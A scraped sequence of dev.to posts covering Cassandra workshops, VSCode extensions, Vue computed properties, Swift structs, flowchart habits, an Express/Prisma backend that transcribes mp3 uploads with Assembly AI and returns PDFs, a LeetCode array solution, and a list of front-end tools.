So, what are you waiting for? Start learning cloud skills! (And once you think you are an expert, read: [Cloud Infrastructure Golden Rules](https://www.karimarttila.fi/iac/2020/04/10/cloud-infrastructure-golden-rules.html) - my personal manifest how to create cloud infrastructures.)
_The writer is working at Metosin using Clojure in cloud projects. If you are interested to start a Clojure project in Finland or you are interested to get Clojure training in Finland you can contact me by sending email to my Metosin email address or contact me via LinkedIn._
Kari Marttila
- Kari Marttila’s Home Page in LinkedIn: [https://www.linkedin.com/in/karimarttila/](https://www.linkedin.com/in/karimarttila/) | karimarttila |
755,312 | Summer Series to learn Cassandra NoSQL DB | For some time I have been following the DataStax Developer workshops regarding the use of the... | 0 | 2021-07-10T08:09:04 | https://dev.to/amylynn87/summer-series-to-learn-cassandra-nosql-db-1kgo | react, netlify, codenewbie, database | For some time I have been following the DataStax Developer workshops regarding the use of the Cassandra NoSql DataBase.
The "Summer Series" workshops are very interesting: this week we created a "ToDo App" in React that communicates with the DB, so all the to-dos are saved and are not lost when the page is refreshed. Next week it will be time to build a TikTok clone (I'm really very curious about it!). The week after that will be a Netflix clone (for which I have already attended a workshop, but there are still some obscure points, so I will follow it again!).
It's all completely free, they offer badges for completing the exercises after following the workshop, and you learn a lot about the NoSQL DB world (and much more!)
Follow them on Youtube and maybe join the next live:
https://www.youtube.com/channel/UCAIQY251avaMv7bBv5PCo-A | amylynn87 |
738,589 | The 15 best extensions for VSCode. | This time I'll show you the 15 extensions you should install in Visual Studio Code to get the most... | 0 | 2021-06-24T23:33:15 | https://dev.to/gdcodev/las-15-mejores-extensiones-para-vscode-2021-430n | vscode, productivity, webdev, espanol |
This time I'll show you the 15 extensions you should install in Visual Studio Code to get the most out of it and make your day-to-day work as a developer easier.
#### Here are the VSCode extensions we will cover:
+ [PRETTIER](#1)
+ [Auto Close Tag](#2)
+ [Auto Rename Tag](#3)
+ [Material Icon Theme](#4)
+ [Bracket Pair Colorizer](#5)
+ [Better Comments](#6)
+ [LIVE SERVER](#7)
+ [LIVE SHARE](#8)
+ [GITLENS](#9)
+ [SNAPCODE](#10)
+ [Settings Sync](#11)
+ [Code Spell Checker](#12)
+ [Import Cost](#13)
+ [Markdown All in One](#14)
+ [Path Intellisense](#15)
---
1. **PRETTIER** <a name="1"></a>
- Formats your code automatically.

2. **Auto Close Tag** <a name="2"></a>
- Adds automatic closing-tag support for your files.

3. **Auto Rename Tag** <a name="3"></a>
- Automatically renames the matching tag. Saves time when renaming a tag.

4. **Material Icon Theme** <a name="4"></a>
- With this theme you get a clean, minimalist, and attractive environment.

5. **Bracket Pair Colorizer** <a name="5"></a>
- Lets you identify matching brackets with colors.

6. **Better Comments** <a name="6"></a>
- Lets you color-code your comments.

7. **LIVE SERVER** <a name="7"></a>
- A local server with live reload for your page.

8. **LIVE SHARE** <a name="8"></a>
- Work on the same code in real time.

9. **GITLENS** <a name="9 "></a>
- A history of who has edited a code snippet in Git.

10. **SNAPCODE** <a name="10"></a>
- Professional-looking code screenshots.

11. **Settings Sync** <a name="11"></a>
- Lets you synchronize your VSCode state across multiple instances.

12. **Code Spell Checker** <a name="12"></a>
- Helps us catch spelling mistakes.

13. **Import Cost** <a name="13"></a>
- Helps productivity by showing the estimated size of an imported package.

14. **Markdown All in One** <a name="14"></a>
- A very useful extension for everything related to Markdown.

15. **Path Intellisense** <a name="15"></a>
- This extension helps you autocomplete import paths.

---
Git repository: https://github.com/gdcodev/extensiones-vscode
📌 My networks: 🔵[Facebook](https://www.facebook.com/gdcode7) | 💼[LinkedIn](https://www.linkedin.com/in/gastondanielsen/) | 💻[Github](https://github.com/gdcodev) | gdcodev |
738,695 | Methods vs Computed in Vue | Hello 👋🏼, Lately I've been learning Vue. So today I learned about computed property. In my... | 0 | 2021-06-25T01:47:08 | https://dev.to/adiatiayu/methods-vs-computed-in-vue-21mj | help, discuss, vue, codenewbie | Hello 👋🏼,
Lately I've been learning Vue.
So today I learned about computed property.
In my understanding (please correct me if I'm wrong), a `computed` property is like a `methods` property, except it is cached and only re-evaluated when the reactive data it depends on changes.
A `methods` property, on the other hand, will be re-executed on every re-render of the page, regardless of which data changed.
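To make the difference concrete, here is a plain-JavaScript sketch of an Options API component (the `reversedName` names and data here are invented for illustration): the computed version is cached against its reactive dependency, while the method version re-runs on every re-render.

```javascript
// A Vue Options API component shape (names invented for illustration).
// `reversedName` as a computed property is cached: Vue re-runs it only
// when `name` changes. The method version re-runs on every re-render,
// even when only `counter` changed.
const component = {
  data() {
    return { name: "Ayu", counter: 0 };
  },
  computed: {
    // cached against its reactive dependency (`this.name`)
    reversedName() {
      return this.name.split("").reverse().join("");
    },
  },
  methods: {
    // re-executed on every re-render of the template
    reversedNameMethod() {
      return this.name.split("").reverse().join("");
    },
  },
};
```

A common rule of thumb: use `computed` for derived values shown in the template, and `methods` for event handlers or anything that needs arguments.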
In which condition is the best practice to use `methods` or `computed`?
Thank you in advance for any help 😊 | adiatiayu |
738,701 | #100DaysOfSwift: Day 8 | Hey ! Today, I learned about structures but for short struct. They are given their own variables,... | 0 | 2021-06-25T02:09:00 | https://dev.to/keeyboardkeda/100daysofswift-day-8-3pe | beginners, ios, swift | Hey !
Today, I learned about structures, or structs for short. They can have their own variables, constants, and functions, and can be used in many ways. Variables inside a struct are called stored properties and computed properties. You can use a struct when you have fixed data that you want to send or receive multiple times.
I learned about all that goes into structs, like the following:
1. Computed properties run code to figure out the struct's value.
2. Property observers which lets you run code before or after any property changes.
3. Methods are functions inside of structs and the functions can use the properties of the struct as needed. Methods belong to structs, enums, and classes.
4. Mutating methods - the `mutating` keyword is used when you want to change properties in a struct. By default, a struct's methods cannot modify its properties.
5. Strings and arrays have their own properties and methods !
Overall, I think today was a good learning day.
Until tomorrow ! | keeyboardkeda |
738,721 | The Importance of Design Before You Start Typing a Program | As someone who is still learning programming, especially for the Web, I want to share a little... | 0 | 2021-06-25T02:51:24 | https://dev.to/0wx/pentingnya-sebuah-desain-sebelum-memulai-mengetik-program-21gm | design, architecture, indonesia | As someone who is still learning programming, especially Web development, I want to share a bit of experience about how I managed to increase my productivity with something simple.
## The Mistake
The fatal mistake of many programmers, one I have also made, is starting to type without sketching out what they want to achieve. They only think through a design whose details will most likely be forgotten in the next 1-2 hours, and they end up wrestling with all kinds of inconsistencies in their program.
Avoid typing a program without laying out an initial design. Make a _flowchart_ of what you want to achieve and how you will achieve it, even for a simple program written just to fill spare time. The habit of drawing a _flowchart_ is great for getting used to having consistent designs going forward.
## Flowchart
Making a _flowchart_ is not complicated either; the basics below already cover ±70% _(based on personal experience)_ of the _flowcharts_ you will make later on.

## Tools
There are two kinds of tools I usually use:
#### 1. A small notebook and a pencil
A small notebook and a pencil are what I use most often, to cut down my screen time; the pencil must have an eraser 😂. I also often go touring on Saturdays and Sundays, so it is perfect when a new idea suddenly appears while hanging out and I can write it down right away. The same goes for coffee meetups with friends. Only when I am back in front of a screen do I redraw it using the second tool.
#### 2. Flowcharts from https://app.diagrams.net/
This is one of my favorite online tools because you don't have to log in (just click the close icon in the top right corner of the login pop-up) and can start drawing right away. Some advantages I like:
1. Dark theme *(A MUST)*
2. No login required
3. A very lightweight web app
## Conclusion and suggestions
Drawing out the design of the program we are going to build really helps improve consistency and shorten production time. Set aside at least 15-30 minutes after your _flowchart_ is finished to reconsider whether everything fits, and work on each part following the arrows.

In the example above, that means building the API first, and once it is done you can try coloring the parts to your taste, as in the example above (green: done, red: not yet).
Hopefully this article helps those of you who are just starting your journey as a developer, or who still often write programs without making a _flowchart_, to start improving efficiency and consistency in your programming. Thank you, and happy drawing! 🎉✍
[0wx.dev](https://0wx.dev) | 0wx |
738,835 | Summarize Zoom Meetings with Assembly AI | Introduction If you've ever wanted to quickly and accurately get your zoom meeting, or any... | 0 | 2021-07-23T23:20:02 | https://dev.to/guilleeh/summarize-zoom-meetings-with-assembly-ai-m3i | assemblyai, node, express | ## Introduction
If you've ever wanted to quickly and accurately turn your Zoom meeting, or any kind of speech, into text, then Assembly AI is the API you need. Today I will cover how to create a simple backend API to handle mp3 file uploads and convert them to PDF files with the transcript included. As a bonus, I will also show sign-in and sign-up functionality.
### What is Assembly AI?
"AssemblyAI is a top rated API for speech recognition, trusted by startups and global enterprises in production" - Assembly AI Website
It is very simple to get started with turning speech to text, and you can do it in just 2 minutes here: https://docs.assemblyai.com/overview/getting-started
You can get your API key here: https://app.assemblyai.com/login/
**Note**: You are limited to 3 hours of processing time for the month with this API.
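To give a feel for the API before we build the backend, here is a minimal sketch of the two-step flow from the quickstart: submit a transcript job, then poll it until it completes. The endpoint paths and header names follow Assembly AI's v2 docs; the polling interval and the helper names below are my own assumptions, so double-check the official documentation.

```javascript
// Sketch of Assembly AI's v2 transcription flow (helper names are mine).
const API_BASE = "https://api.assemblyai.com/v2";

// Build the request for submitting a transcript job. The audio URL must be
// publicly reachable (or an upload URL returned by Assembly AI).
function transcriptRequest(apiKey, audioUrl) {
  return {
    url: `${API_BASE}/transcript`,
    options: {
      method: "POST",
      headers: {
        authorization: apiKey,
        "content-type": "application/json",
      },
      body: JSON.stringify({ audio_url: audioUrl }),
    },
  };
}

// Poll the job until it completes or errors. The 3-second interval is an
// arbitrary choice, not something the API mandates.
async function waitForTranscript(apiKey, id, fetchFn = fetch) {
  while (true) {
    const res = await fetchFn(`${API_BASE}/transcript/${id}`, {
      headers: { authorization: apiKey },
    });
    const job = await res.json();
    if (job.status === "completed") return job.text;
    if (job.status === "error") throw new Error(job.error);
    await new Promise((r) => setTimeout(r, 3000));
  }
}
```

In the backend we build below, a flow like this would run after the mp3 upload, and the returned text would be fed into pdfkit.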
## Backend Stack
The following technologies will be used to build our backend.
- PostgreSQL
- Node.js
- Express
- Prisma ORM
- Bcrypt
- JWT
- pdfkit
## Requirements
You will need PostgreSQL in your system. I use this software: [PostgreSQL](https://postgresapp.com/)
Once PostgreSQL is installed, you will have to create the database and user with the following commands
```
$ createdb zoom-summarizer
$ createuser -P -s -e zoom_summarizer_user
```
Next, clone my express-prisma-starter to have the same code: [Code Starter](https://github.com/guilleeh/express-prisma-starter)
Create a .env file inside the repo, and include this so that Prisma knows the database to connect to.
```
DATABASE_URL = 'postgresql://zoom_summarizer_user@localhost:5432/zoom-summarizer'
```
Lastly, install the dependencies and run the migration to set up the tables.
```
$ npm i
$ npx prisma migrate dev --name init
```
## Development
**If you want to skip to the point where we use the Assembly AI API, click [here]()**
### Sign Up
We will start off with the sign-up endpoint, where we will collect a name, email, and password. Don't worry, we are going to hash the password, of course.
Inside your source folder, create a new folder called **db**, with a file called **db.js**. In here, we will have all database calls. We are doing this to decouple the data layer from the business logic and routes.
- Add create user CRUD in db.js
```javascript
const { PrismaClient } = require("@prisma/client");
const prisma = new PrismaClient();
// CREATE
const createUser = async (email, password, name) => {
const result = await prisma.user.create({
data: {
email,
password,
name,
},
});
return result;
};
module.exports = {
createUser,
};
```
- Add post route for sign up in index.js
```javascript
const db = require("./db/db");
const bcrypt = require("bcrypt");
const jwtService = require("jsonwebtoken");
const express = require("express");
const app = express();
app.use(express.json());
app.get(`/`, async (req, res) => {
res.json({ success: true, data: "Hello World!" });
});
app.post("/signup", async (req, res) => {
const { email, password, name } = req.body;
if (!email || !password || !name) {
res.status(400).json({
success: false,
error: "Email, password and name are required.",
});
return;
}
try {
// hash password
const salt = await bcrypt.genSalt(Number(process.env.SALT_ROUNDS));
const passwordHash = await bcrypt.hash(password, salt);
// create user
const response = await db.createUser(email, passwordHash, name);
res.json({ success: true, data: response });
} catch (e) {
console.log(e);
res.status(409).json({
success: false,
error: "Email account already registered.",
});
}
});
```
To test, hit http://localhost:3001/signup with a POST request with the body:
```JSON
{
"email": "memo@memo.com",
"password": "123",
"name": "Guillermo"
}
```
And that's it for the sign-up endpoint! Pretty straightforward. We use bcrypt to hash the password. This was a quick implementation, though, so you should look into a more serious solution if you want to take this to production.
### Sign In
Now that we can register users, it's time to log them in. We will be using JWT tokens in order to keep track of sessions. This is not the most secure method (refresh tokens would be safer), but it will do for this tutorial.
We're going to create another folder inside src, called **lib**. Here we are going to put any code dealing with jwt, aws and pdfkit.
Create the folder lib and the file **jwt.js**
- lib/jwt.js
```javascript
const jwt = require("jsonwebtoken");
const getJWT = async (id, email) => {
try {
return jwt.sign(
{
email,
id,
},
process.env.JWT_SECRET,
{
expiresIn: Number(process.env.JWT_EXPIRE_TIME),
}
);
} catch (e) {
throw new Error(e.message);
}
};
const authorize = (req, res, next) => {
// middleware to check if user is logged in
try {
const token = req.headers.authorization.split(" ")[1];
jwt.verify(token, process.env.JWT_SECRET);
next();
} catch (error) {
res.status(401).json({ success: false, error: "Authentication failed." });
}
};
module.exports = {
getJWT,
authorize,
};
```
Here, getJWT will give us a token for the frontend to store, and authorize is a middleware we will be using in protected routes to make sure a user is logged in.
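To make the middleware a little less magical, here is a standalone sketch of what a JWT looks like on the wire. Note that the token below is hand-built and unsigned, purely for illustration; decoding a payload like this verifies nothing, which is exactly why `authorize` must still call `jwt.verify()` before trusting it.

```javascript
// A JWT is three base64url-encoded segments joined by dots:
// header.payload.signature
const encode = (obj) => Buffer.from(JSON.stringify(obj)).toString("base64url");

// Hand-built, UNSIGNED token with the same payload shape getJWT() uses:
const fakeToken = [
  encode({ alg: "HS256", typ: "JWT" }),
  encode({ email: "memo@memo.com", id: 1 }),
  "fake-signature",
].join(".");

// Mirrors the header parsing inside authorize():
const token = `Bearer ${fakeToken}`.split(" ")[1];

// Anyone can read the payload without the secret -- never trust it unverified:
const payload = JSON.parse(
  Buffer.from(token.split(".")[1], "base64url").toString()
);
console.log(payload.email); // memo@memo.com
console.log(payload.id);    // 1
```

This is also a handy way to debug why a token was rejected (for example, an expired `exp` claim) without pasting real tokens into third-party websites.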
Next, replace this line on top of the index.js file:
```javascript
const jwtService = require("jsonwebtoken");
```
With this line:
```javascript
const jwtLib = require("./lib/jwt");
```
Now we need to get a user by the email they entered, in order to compare passwords.
Add this function to **db.js**:
db.js
```javascript
// READ
const getSingleUserByEmail = async (email) => {
const user = await prisma.user.findFirst({
where: { email },
});
return user;
};
module.exports = {
createUser,
getSingleUserByEmail
};
```
To finish off this sign-in endpoint, we will create a post route for it inside of **index.js**
index.js
```javascript
app.post("/signin", async (req, res) => {
const { email, password } = req.body;
if (!email || !password) {
res
.status(400)
.json({ success: false, error: "Email and password are required." });
return;
}
try {
// Find user record
const user = await db.getSingleUserByEmail(email);
if (!user) {
res.status(401).json({ success: false, error: "Authentication failed." });
return;
}
// securely compare passwords
const match = await bcrypt.compare(password, user.password);
if (!match) {
res.status(401).json({ success: false, error: "Authentication failed." });
return;
}
// get jwt
const jwtToken = await jwtLib.getJWT(user.id, user.email);
// send jwt and user id to store in local storage
res
.status(200)
.json({ success: true, data: { jwt: jwtToken, id: user.id } });
} catch (e) {
console.log(e);
res.status(500).json({
success: false,
error: `Authentication failed.`,
});
}
});
```
### Upload & Audio Processing
Now we finally get to the part where we use the Assembly AI API in order to get a transcript of our mp3 files!
First, we will upload our files to S3 so that the Assembly AI API has a place to pull the audio from.
Inside of **src/lib**, create a new file called **aws.js**.
aws.js
```javascript
const AWS = require("aws-sdk");
const s3 = new AWS.S3({ apiVersion: "2006-03-01" });
const uploadFile = async (file) => {
const params = {
Bucket: process.env.AWS_S3_BUCKET_NAME,
Key: file.name,
Body: file.data,
};
try {
const stored = await s3.upload(params).promise();
return stored;
} catch (e) {
console.log(e);
throw new Error(e.message);
}
};
module.exports = {
uploadFile,
};
```
This code will take care of our s3 file uploads.
Next we will create the last library file called **pdf.js** inside lib. Here we will take care of turning the text from the Assembly AI API into a nice pdf format.
pdf.js
```javascript
const PDF = require("pdfkit");
const generatePdf = (title, text, terms, res) => {
const pdf = new PDF({ bufferPages: true });
let buffers = [];
pdf.on("data", buffers.push.bind(buffers));
pdf.on("end", () => {
let pdfData = Buffer.concat(buffers);
res
.writeHead(200, {
"Content-Length": Buffer.byteLength(pdfData),
"Content-Type": "application/pdf",
"Content-disposition": `attachment;filename=${title}.pdf`,
})
.end(pdfData);
});
pdf.font("Times-Roman").fontSize(20).text(title, {
align: "center",
paragraphGap: 20,
});
pdf.font("Times-Roman").fontSize(12).text(text, {
lineGap: 20,
});
if (terms) {
const termsArr = terms.results.sort((a, b) => b.rank - a.rank);
const cleanedTerms = termsArr.map((term) => term.text);
pdf.font("Times-Roman").fontSize(16).text("Key Terms", {
align: "center",
paragraphGap: 20,
});
pdf
.font("Times-Roman")
.fontSize(12)
.list(cleanedTerms, { listType: "numbered" });
}
pdf
.fillColor("gray")
.fontSize(12)
.text(
"Transcript provided by AssemblyAI ",
pdf.page.width - 200,
pdf.page.height - 25,
{
lineBreak: false,
align: "center",
}
);
pdf.end();
};
module.exports = {
generatePdf,
};
```
The format of the PDF is really up to you; this one is a basic paragraph plus a list of key terms.
We also need to store the transcriptId that the AssemblyAI API gives us in order to fetch the transcript text later, so we will create db functions for it inside db.js
db.js
```javascript
const createRecording = async (name, s3Key, transcriptId, email) => {
const result = await prisma.recording.create({
data: {
name,
s3Key,
transcriptId,
user: {
connect: {
email,
},
},
},
});
return result;
};
const getSingleUserById = async (id) => {
const user = await prisma.user.findFirst({
where: { id },
});
return user;
};
module.exports = {
createUser,
createRecording,
getSingleUserByEmail,
getSingleUserById,
};
```
Lastly, we can put this all together to upload an mp3 file, call the Assembly AI API to process that file from S3, and save the transcript Id to later fetch the transcript as a pdf file.
Your index.js file should look like this:
index.js
```javascript
const db = require("./db/db");
const jwtLib = require("./lib/jwt");
const awsLib = require("./lib/aws");
const pdfLib = require("./lib/pdf");
const fetch = require("node-fetch");
const bcrypt = require("bcrypt");
const express = require("express");
const fileUpload = require("express-fileupload");
const cors = require("cors");
const { response } = require("express");
const app = express();
app.use(cors());
app.use(express.json());
app.use(fileUpload());
.
.
.
app.post("/upload", jwtLib.authorize, async (req, res) => {
const { id } = req.body;
if (!id) {
return res
.status(400)
.json({ success: false, error: "You must provide the user id." });
}
if (!req.files || Object.keys(req.files).length === 0) {
return res
.status(400)
.json({ success: false, error: "No files were uploaded." });
}
try {
const file = req.files.uploadedFile;
// upload to s3
const uploadedFile = await awsLib.uploadFile(file);
const { Location, key } = uploadedFile;
const body = {
audio_url: Location,
auto_highlights: true,
};
// call aai api
const response = await fetch(process.env.ASSEMBLYAI_API_URL, {
method: "POST",
body: JSON.stringify(body),
headers: {
authorization: process.env.ASSEMBLYAI_API_KEY,
"content-type": "application/json",
},
});
const result = await response.json();
if (result.error) {
console.log(result);
res.status(500).json({
success: false,
error: "There was an error uploading your file.",
});
return;
}
// get user email
const user = await db.getSingleUserById(Number(id));
const { email } = user;
// save transcript id to db
const recording = await db.createRecording(
file.name,
key,
result.id,
email
);
res.status(200).json({ success: true, data: recording });
} catch (e) {
console.log(e);
res.status(500).json({
success: false,
error: "There was an error uploading your file.",
});
}
});
```
Notice that we use the authorize middleware for this endpoint and we also need to send the user Id that you get once you log in.
All we need now is an endpoint to generate our PDF, so let's get to it.
Let's add a db function to get the transcript we saved.
db.js
```javascript
const getSingleRecording = async (transcriptId) => {
const recording = await prisma.recording.findFirst({
where: {
transcriptId,
},
});
return recording;
};
module.exports = {
createUser,
createRecording,
getSingleUserByEmail,
getSingleUserById,
getSingleRecording,
};
```
And now we can create the endpoint to generate a pdf
```javascript
app.post("/generate-pdf", jwtLib.authorize, async (req, res) => {
const { transcriptId } = req.body;
if (!transcriptId) {
return res
.status(400)
.json({ success: false, error: "You must provide the transcript id." });
}
try {
const url = process.env.ASSEMBLYAI_API_URL + "/" + transcriptId;
const response = await fetch(url, {
method: "GET",
headers: {
authorization: process.env.ASSEMBLYAI_API_KEY,
"content-type": "application/json",
},
});
const result = await response.json();
if (result.error) {
console.log(result);
res.status(500).json({
success: false,
error: "There was an error retrieving your recording.",
});
return;
}
const { text, auto_highlights_result } = result;
const recordingRecord = await db.getSingleRecording(transcriptId);
const { name } = recordingRecord;
pdfLib.generatePdf("Transcript", text, auto_highlights_result, res);
} catch (e) {
console.log(e);
res.status(500).json({
success: false,
error: "There was an error retrieving your recordings.",
});
}
});
```
Now you just need to provide the endpoint with the transcriptId you saved in the database, and it will return a pdf file for you!
### Wrap up
That's it! You have a basic app that allows users to sign in/up, upload mp3 conversations, and get transcripts back in pdf format. There is tons of room for growth in this project, and if you would like to try it out for yourself, check the links below.
Source Code: https://github.com/guilleeh/zoom-summarizer
Demo: https://zoom-summarizer.vercel.app/
The source code is a full stack application, so you can see how I put this all together.
Hope you all learned something today!
| guilleeh |
738,904 | Leetcode Array Problem Solutions (Remove Duplicates From Sorted Array) | In today's article, we are going to solve another leetcode problem and the statement for today's... | 0 | 2021-06-25T08:11:06 | https://dev.to/saurabhnative/leetcode-array-problem-solutions-remove-duplicates-from-sorted-array-236f | leetcode, javascript, interviewquestions, competitiveprogramming | In today's article, we are going to solve another leetcode problem and the statement for today's problem is to remove duplicate from a sorted array.
Link to the problem:-
https://leetcode.com/explore/learn/card/fun-with-arrays/511/in-place-operations/3258/
Agenda:-
- We are going to remove duplicate elements from a sorted array using javascript.
- We will also learn how to use the splice method to remove elements from an array.
We are given an integer array called nums with elements sorted in non-decreasing order, that is, in ascending order with repeats allowed. We need to remove the duplicates, but in place: we cannot clone the array or create another array for removing the duplicates; we need to do it in the same array itself.
The order of the elements should also be kept as it is after removing duplicates. We are supposed to return the length of the array after removing duplicate elements.
Let's build a solution to the problem step by step:-
Since we need to remove duplicates from this array, we obviously need to iterate over it once, so we can either use a for loop or the map function to iterate over the input array:-
```javascript
const removeDuplicates = function(nums) {
nums.map((element, index) => {
console.log("element", element);
console.log("index", index);
});
}
```
Within every iteration or cycle of this loop, we need to check whether duplicates exist. We can see if the next element is a duplicate by using an if condition, as shown below:-
```
...
console.log("index", index);
if(element === nums[index+1]) {
// code to remove duplicate elements
}
```
We need to declare a variable to keep track of duplicate elements. If a duplicate element exists, then we will increment the value of this variable. To calculate the total number of duplicate elements, we will run a for loop from the element after the current index to the length of the array, as shown below:-
```
...
if(element === nums[index+1]) {
let numberOfDuplicates = 0;
for(let i=index+1;i<nums.length;i++) {
if(nums[i] === element) {
++numberOfDuplicates;
} else {
break;
}
}
console.log("numberOfDuplicates", numberOfDuplicates);
}
```
We have added a break statement in the else block so that we can stop iterating once the total number of duplicate elements has been calculated.
Next, we need to remove the duplicate elements from the array, for which we are going to use the array [splice](https://www.w3schools.com/jsref/jsref_splice.asp) method. With splice, the first input is the index at which to start removing (or adding) elements, and the second input is the total number of elements to remove.
In our case, we need to remove elements starting from the index after the current element, and the total number of elements to remove is the duplicate count stored in the `numberOfDuplicates` variable above.
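To see that splice behavior in isolation, here is a tiny sketch using the kind of input this problem deals with:

```javascript
const nums = [0, 0, 1, 1, 1, 2];
// Start removing at index 1, and remove 1 element (the duplicate 0):
const removed = nums.splice(1, 1);
console.log(removed); // [0]  (splice returns the removed elements)
console.log(nums);    // [0, 1, 1, 1, 2]  (the array is mutated in place)
```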
So the final solution to the problem is as shown below:-
```javascript
const removeDuplicates = function(nums) {
nums.map((element, index) => {
console.log("element", element);
console.log("index", index);
if(element === nums[index+1]) {
let numberOfDuplicates = 0;
for(let i=index+1;i<nums.length;i++) {
if(nums[i] === element) {
++numberOfDuplicates;
} else {
break;
}
}
// console.log("numberOfDuplicates", numberOfDuplicates);
nums.splice(index+1, numberOfDuplicates);
}
});
// console.log("output array", nums);
return nums.length;
};
```
We return the length of the array at the end since that is what the problem statement asks for. If we run this solution on leetcode, it is accepted for all the test cases. We have commented out the `console.log` statements in the final solution since they are no longer required.
After we've finished any kind of computer programming problem, we usually go for a time complexity calculation. We have a map function at the top, which can be considered a for loop, and there is an inner for loop for calculating duplicate elements. With nested loops like this, the time complexity of the solution is O(n<sup>2</sup>).
Now, there might be some better solutions that reduce the time complexity, but I have covered the simplest possible solution that I could think of. As we learn more data structures and algorithms in the future, we will try to come up with better solutions.
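For the curious, one well-known alternative (not part of the solution above) is the two-pointer technique: keep a "write" index for the last unique element and overwrite duplicates as you scan, which avoids splice entirely and runs in O(n). A sketch:

```javascript
const removeDuplicatesFast = function (nums) {
  if (nums.length === 0) return 0;
  let write = 0; // index of the last unique element kept so far
  for (let read = 1; read < nums.length; read++) {
    if (nums[read] !== nums[write]) {
      write++;
      nums[write] = nums[read]; // move the next unique element forward
    }
  }
  nums.length = write + 1; // trim the array in place
  return nums.length;
};

const arr = [0, 0, 1, 1, 1, 2, 2, 3, 3, 4];
console.log(removeDuplicatesFast(arr)); // 5
console.log(arr); // [0, 1, 2, 3, 4]
```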
You can view video explanation for the problem below:-
{% youtube zKcNYIsrq4s %}
If you found this tutorial useful, hit the like button, follow my blog, and if there is anyone you know who would benefit from such articles on data structures in JavaScript or interview preparation, please share it with them as well. Goodbye and have a nice day.
---------------------------------------------------------------------------------------------------
Join my discord server for help :
🌐 discord server: https://discord.gg/AWbhSUWWaX
---------------------------------------------------------------------------------------------------
Suggestions and Feedback
🐦 TWITTER: https://twitter.com/saurabhnative
🎥 INSTAGRAM: https://www.instagram.com/saurabhnative/?hl=en
---------------------------------------------------------------------------------------------------
For collaboration, connect with me on Twitter
🐦 TWITTER: https://twitter.com/saurabhnative
---------------------------------------------------------------------------------------------------
Support me on Kofi
🤝 https://ko-fi.com/saurabhmhatre
---------------------------------------------------------------------------------------------------
| saurabhnative |
738,963 | Creating a group | Hey there pls help me. Can anybody tell me that how to create a group at dev.to/connect because I... | 0 | 2021-06-25T09:25:00 | https://dev.to/darshkul24/creating-a-group-1bbi | help, discuss, dev, group | Hey there pls help me. Can anybody tell me that how to create a group at dev.to/connect because I don't know pls your help will be greate
Thanks for reading my post. Please press the like and unicorn buttons before you go.
Thank you
Darsh kulthia | darshkul24 |
739,051 | 😍 Earn 40% For Every Customer ( ≈ $23 / Sale ) | Hello👋, We are very happy to announce Frontendor affiliate program. Frontendor lets developers... | 0 | 2021-06-25T10:30:51 | https://dev.to/frontendor/earn-40-for-every-customer-23-sale-190o | Hello👋,
We are very happy to announce the Frontendor affiliate program.
Frontendor lets developers construct gorgeous landing pages quickly and easily using a simple copy-paste method. The current deal is Frontendor 2.0!
Your efforts are valuable to us and that is why we offer a high commission percentage.
✅ 30 days cookie duration.
✅ Get paid instantly ( Using Gumroad ).
✅ Exclusive Affiliate Kit.
Join our affiliate program today! :
https://frontendor.com/affiliates/ | frontendor | |
739,156 | Tools for Web Developers To Work Smarter and not Harder | "A man is only as good as his tools" -Emmert Wolf In the software development... | 0 | 2021-06-25T13:30:23 | https://vickyikechukwu.hashnode.dev/tools-for-web-developers-to-work-smarter-and-not-harder | webdev, frontend, productivity, tutorial | <blockquote>
"A man is only as good as his tools" <br>
<span> -Emmert Wolf</span>
</blockquote>
In the software development industry, this would closely translate to `A developer is only as good as his tools`, as the difference in productivity between two developers with the same technical knowledge often comes down to their toolset.
Hello There 👋, Beautiful Coder on the internet. Welcome back to my blog. In this blog, I write articles about tech, programming, and my life as a teenage developer. In this article, I'm going to round up some of the most interesting front-end developer tools of 2021. Which you will definitely find useful for your own development workflow.
The key to being a productive developer is to work smarter, not harder, using tools that speed up most of the tasks you do, make you more productive, and simplify your work.
These development tools aren't necessarily the most popular or hottest of 2021 👉👈, but they do come in handy for me, simplifying my work and making me more productive, as I'm sure they will for you too 😏. Already excited? Let's get started.
## ⚙️ Web Developer

<div>
</div>
First up, <a href="https://chrispederick.com/work/web-developer/">Web Developer</a>. This is definitely my favorite tool on the list, hence it comes first 😄. <a href="https://chrispederick.com/work/web-developer/">Web Developer</a> is a browser extension that adds various **web developer tools** to your browser. Add it to your web browser and take development to the next level. The extension is available for Chrome, Firefox, and Opera.
Once installed. you can open a panel like this.

That gives you access to a lot of amazing commands, like toggling CSS and JavaScript for a site on or off, viewing the semantic structure of a site, inspecting how it looks on various screen sizes, and disabling images to see if they have alt text. The list is endless 😄.
## QUOKKA.JS

`RAPID JAVASCRIPT PROTOTYPING IN YOUR EDITOR`
[Quokka](https://quokkajs.com/) is a developer productivity tool, That helps developers to rapidly prototype JavaScript or Typescript Code right in their code editor. Quokka makes **prototyping**,**learning** and **testing** JavaScript and Typescript code **blazingly fast**. With Quokka, there are no configurations required by default. All you need to do is simply start up a JavaScript/Typescript file and you are ready to go 👍.
To get started using Quokka, you can install it as an extension in your code editor. Head over to their website and get the version for your code editor and directions on how to set it up. Quokka has two editions, The **Community** edition which is free for everyone but has a few limitations, `bear this in mind 👀`. And a commercial **Pro** edition that provides some additional features but you have to pay for it.
Here's a sneak peek of it in action.

## Google Lighthouse
<!-- img -->

Coding is a very demanding task, and as such, it is common to make mistakes that decrease the overall quality of your site. That's where Google Lighthouse comes in.
[Google Lighthouse](https://developers.google.com/web/tools/lighthouse/) is an open-source, automated development tool for testing/improving the quality of your web pages.
Google Lighthouse lets you audit (examine) your web applications based on several parameters, including performance, accessibility, mobile compatibility, Progressive Web App (PWA) implementations, SEO, and more. All you have to do is run it on a page or pass it a URL, sit back, and get a very elaborate report with amazing feedback on how to improve the quality and performance of your site. All in just a few clicks.
You can get started with Google Lighthouse if you have the [Google Chrome for Desktop](https://www.google.com/chrome/browser/desktop/?) Browser. Or If you are a fan of the Command-Line, then you can use the [Lighthouse NPM package ](https://www.npmjs.com/package/lighthouse?&url=151?&url=85) and its CLI.
See this article on [using Google Lighthouse ](https://flexiple.com/developers/using-google-lighthouse-to-audit-your-web-application/).
## Grammarly
<div>

`Say Goodbye to Textfails`
</div>
One for the technical writers. [Grammarly](https://www.grammarly.com/) is a writing assistant that puts your writing at its best. Grammarly scans what you write for common grammatical mistakes (like misused commas) and complex ones (like misplaced modifiers). Personally, as a technical writer, Grammarly has really helped me improve my writing skills and confidence in blogging, which has led to better, typo-free articles, as I'm sure it will for you 🙌.
## Webflow

